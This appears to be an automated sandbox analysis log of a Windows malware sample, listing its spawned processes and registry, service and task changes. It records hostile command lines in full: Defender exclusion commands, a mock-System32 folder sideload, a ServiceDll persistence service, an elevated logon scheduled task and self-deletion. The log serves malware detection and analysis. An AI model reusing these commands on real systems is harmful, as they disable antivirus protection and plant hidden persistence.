Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ED7EC083_2_00007FF7D6ED7EC0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EF4E7C83_2_00007FF7D6EF4E7C
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EEEE4C83_2_00007FF7D6EEEE4C
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFBBF083_2_00007FF7D6EFBBF0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ECABD083_2_00007FF7D6ECABD0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EBCBC083_2_00007FF7D6EBCBC0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ED8B9683_2_00007FF7D6ED8B96
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EF3B7883_2_00007FF7D6EF3B78
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EE2B5883_2_00007FF7D6EE2B58
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFAC8483_2_00007FF7D6EFAC84
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFCA0083_2_00007FF7D6EFCA00
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ED898083_2_00007FF7D6ED8980
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EC8AA083_2_00007FF7D6EC8AA0
Source: Joe Sandbox View | Dropped File: C:\Windows \System32\printui.dll 397A1DD2D8DCDE26F5D22AE33AFBF6C6201920F8D27EE213B65896FE99944239
Source: libintl-9.dll.27.dr | Static PE information: Number of sections : 20 > 10
Source: libiconv-2.dll.27.dr | Static PE information: Number of sections : 20 > 10
Source: libwinpthread-1.dll.27.dr | Static PE information: Number of sections : 12 > 10
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelibcurl.dllB vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNamelibpq.dll6 vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWinPthreadGCp( vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamezlib1.dll* vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameucrtbase.dllj% vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelibsslH vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameiconv.dllv+ vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamevcruntime140d.dll^ vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameintl.dllp( vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelibcryptoH vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameiconv.dllv+ vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamevcruntime140d.dll^ vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameintl.dllp( vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelibcryptoH vs pyld611114.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f
Source: classification engine | Classification label: mal100.evad.winEXE@125/51@4/5
Source: C:\Windows\System32\svchost.exe | Code function: 42_2_00007FFDA36F59C0 GetFileAttributesA,GetLastError,_errno,CreateFileA,GetLastError,DeviceIoControl,_errno,GetLastError,FormatMessageA,libintl_gettext,__acrt_iob_func,LocalFree,CloseHandle,_errno,CloseHandle,WideCharToMultiByte,_errno,isalpha,memcpy,
Source: C:\Windows\System32\crypti.exe | File created: C:\Users\Public\tmp.enc
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6648:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:796:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4196:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:716:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1664:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2268:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2612:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5w0z5r2.cfz.ps1
Source: pyld611114.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pyld611114.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: pyld611114.exe | ReversingLabs: Detection: 76%
Source: svchost.exe | String found in binary or memory: -start
Source: svchost.exe | String found in binary or memory: -addr
Source: svchost.exe | String found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
Source: unknown | Process created: C:\Users\user\Desktop\pyld611114.exe "C:\Users\user\Desktop\pyld611114.exe"
Source: C:\Users\user\Desktop\pyld611114.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Users\user\Desktop\pyld611114.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\usvcinsta64.exe "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Users\user\Desktop\pyld611114.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld611114.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\usvcinsta64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\usvcinsta64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\usvcinsta64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\usvcinsta64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\usvcinsta64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Windows \System32\printui.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows \System32\printui.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f && sc start x816796
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start x816796
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
Source: C:\Windows \System32\printui.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\console_zero.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows \System32\printui.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\console_zero.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: unknown | Process created: C:\Windows\System32\console_zero.exe C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\console_zero.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\console_zero.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Users\user\Desktop\pyld611114.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Users\user\Desktop\pyld611114.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"Jump to behavior
Source: C:\Users\user\Desktop\pyld611114.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld611114.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\usvcinsta64.exe "C:\Windows\System32\usvcinsta64.exe" Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f && sc start x816796
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x816796
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Users\user\Desktop\pyld611114.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\pyld611114.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
